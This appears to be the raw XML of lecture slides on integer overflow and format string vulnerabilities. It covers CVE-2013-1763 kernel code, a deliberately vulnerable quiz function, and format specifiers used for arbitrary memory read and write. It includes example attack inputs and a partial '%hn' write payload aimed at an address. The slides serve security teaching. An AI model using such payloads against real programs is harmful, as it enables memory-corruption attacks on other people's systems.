                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>, char value, int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&lt;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arr[</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 value;</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7" name="Shape 2027"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1161733" y="4075467"/>
            <a:ext cx="1536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IO2BO</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2028" name="Shape 2028"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705200" y="4075467"/>
            <a:ext cx="2354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Array index OOB</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin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Shape 203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in Linux kernel</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2034" name="Shape 2034"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539233" y="1841433"/>
            <a:ext cx="60836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0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>CVE-2013-1763 Linux Kernel netlink message family number overflow</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1"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net/core/sock_diag.c View file @ 6e601a5</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-121,6 +121,9 @@ static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>__sock_diag_rcv_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>(struct sk_buff *skb, struct nlmsghdr *nlh)</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if (nlmsg_len(nlh) &lt; sizeof(*req))</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return -EINVAL;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if (req-&gt;sdiag_family &gt;= AF_MAX)</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return -EINVAL;</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hndl = sock_diag_lock_handler(req-&gt;sdiag_family);</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(hndl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err = -ENOENT;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else</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err = hndl-&gt;dump(skb, nlh);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2035" name="Shape 2035"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6692000" y="1841433"/>
            <a:ext cx="50844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kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>static const inline struct sock_diag_handler *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sock_diag_lock_handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>(int </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(sock_diag_handlers[family]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request_module("net-pf-%d-proto-%d-type-%d", PF_NETLINK,</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NETLINK_SOCK_DIAG, family);</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mutex_lock(&amp;sock_diag_table_mutex);</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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sock_diag_handlers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>[</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Shape 204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Quiz</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2042" name="Shape 2042"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="9721850" cy="1731963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-423323">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integer Overflow vulnerability can be regarded as some kind of logic bug.</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integer overflow itself cannot be exploited, it is usually used to trigger buffer overflow/heap overflow or used with ROP, ret2libc, etc.</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2041" name="Shape 2041"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5195867" y="4144933"/>
            <a:ext cx="6314400" cy="23364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a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int test(short param, int value)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int * mybuf = (int *)malloc(65536 * sizeof(int));</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if (param &lt; 0)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param = -param;</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mybuf[param] = value;</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return mybuf;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a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2043" name="Shape 2043"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766733" y="41449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AB40"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Quiz: can you find</a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFAB40"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2667" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFAB40"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>the vuln?</a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFAB40"/>
              </a:solidFill>
              <a:latin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Shape 204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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2049" name="Shape 2049"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1792288"/>
            <a:ext cx="11360150" cy="4554537"/>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t>Discovered and public since June 1999</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Shocked the security community in the second half of 2000(influenced lots of programs)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Format String Attacks, Newsham (2001)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use %x and %n to achieve arbitrary read and write</a:t>
            </a:r>
            <a:endParaRPr>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Shape 205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Vuln Discovered(year2000)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2055" name="Shape 2055"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="526967" y="1651467"/>
            <a:ext cx="11138067" cy="49309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Shape 20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related Functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2061" name="Shape 2061"/>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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• fprintf — prints to a FILE stream</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• printf — prints to the ‘stdout’ stream</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• sprintf — prints into a string</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• snprintf — prints into a string with length checking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• vfprintf — print to a FILE stream from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• vprintf — prints to ‘stdout’ from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• vsprintf — prints to a string from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• vsnprintf — prints to a string with length checking from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• setproctitle — set argv[]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• syslog — output to the syslog facility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30837" y="1434895"/>
            <a:ext cx="833032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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45D6B1A7-57DC-4FE9-B40B-096F28BB1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432" y="2277991"/>
            <a:ext cx="5504762" cy="3342857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFCFD4E-9968-41AB-B367-AA9CD9F34C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4007548" y="5620848"/>
            <a:ext cx="899605"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节视图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89AB3CE3-B932-4FA0-8A70-CA807FFB2736}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6761480" y="5606344"/>
            <a:ext cx="877163"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段视图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B8770E1-A82E-4967-BE7A-6D510B03673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4170921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Shape 206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syntax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2067" name="Shape 206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a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  print null terminated string pointed by arg pointer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  print hex value of the arg (arbitrary read)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  store the bytes_written to location pointed by arg pointer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - store 2 bytes (short integer)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - store 1 byte</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%&lt;positive integer&gt;c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  print arbitrary count of chars controlled by integer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%123c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (filled by space)    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%0512c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(filled by 0)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Useful to change bytes_written so far</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%&lt;positive integer&gt;$&lt;fmt&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>specify arg index</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%12$n</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consola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Shape 207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3" name="Shape 2073"/>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buSzPts val="1100"/>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Shape 207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9" name="Shape 2079"/>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2400" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>$ ./fmt %x:%x:%x:%x:%x:%x</a:t>
            </a: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ffffda9c:3ff:1b1ea4:253a7825:78253a78:3a78253a</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pP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 ./fmt %s:%s:%s:%s:%s:%s</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Segmentation fault (core dumped)</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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Shape 208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85" name="Shape 2085"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="2265100"/>
            <a:ext cx="2598400" cy="7136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%4911x%7$hn%65536x%8$hn</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2086" name="Shape 2086"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="2978700"/>
            <a:ext cx="2598400" cy="574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0x804a036</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
